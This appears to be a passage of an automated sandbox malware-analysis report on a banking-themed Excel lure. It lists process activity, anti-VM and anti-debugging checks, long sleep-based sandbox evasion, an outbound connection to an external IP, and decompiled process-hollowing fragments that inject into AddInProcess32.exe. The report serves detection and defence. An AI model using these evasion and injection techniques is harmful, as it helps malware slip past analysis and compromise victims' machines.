                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxStream path 'Workbook' entropy: 7.99380030039 (max. 8.0)
                    Source: 46930000.0.drStream path 'Workbook' entropy: 7.98848625178 (max. 8.0)

                    Malware Analysis System Evasion

                    barindex
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: powershell.exe, 0000000C.00000002.510894342.000000001241D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.0000000002465000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.619170569.00000000024EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 3D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 5B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3176Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6790Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 704Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3002Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.dllJump to dropped file
                    Source: C:\Windows\System32\mshta.exe TID: 1688Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3084Thread sleep count: 3176 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3084Thread sleep count: 6790 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3128Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3132Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\wscript.exe TID: 3300Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3416Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3420Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3420Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3420Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3484Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: AddInProcess32.exe, 0000000E.00000002.619170569.00000000024EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: AddInProcess32.exe, 0000000E.00000002.619170569.00000000024EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: AddInProcess32.exe, 0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_003D5310 CheckRemoteDebuggerPresent,14_2_003D5310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\System32\wscript.exeNetwork Connect: 94.156.65.247 80Jump to behavior
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3324, type: MEMORYSTR
                    Source: 12.2.powershell.exe.2cef590.1.raw.unpack, RunPEE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
                    Source: 12.2.powershell.exe.2cef590.1.raw.unpack, RunPEE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
                    Source: 12.2.powershell.exe.2cef590.1.raw.unpack, RunPEE.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num7 + num14, array2, array2.Length, ref bytesWritten)
                    Source: 12.2.powershell.exe.2cef590.1.raw.unpack, RunPEE.csReference to suspicious API methods: lIuveTP8wwjVYKV1XP(VirtualAllocEx, processInformation.ProcessHandle, 0, length, 12288, 64)
                    Source: 12.2.powershell.exe.2cef590.1.raw.unpack, RunPEE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num15 + 8, ref buffer, 4, ref bytesWritten)
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, Ljq6xD21ACX.csReference to suspicious API methods: OZkujShDCVG.OpenProcess(aPNZ30.DuplicateHandle, bInheritHandle: true, (uint)snUp2.ProcessID)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
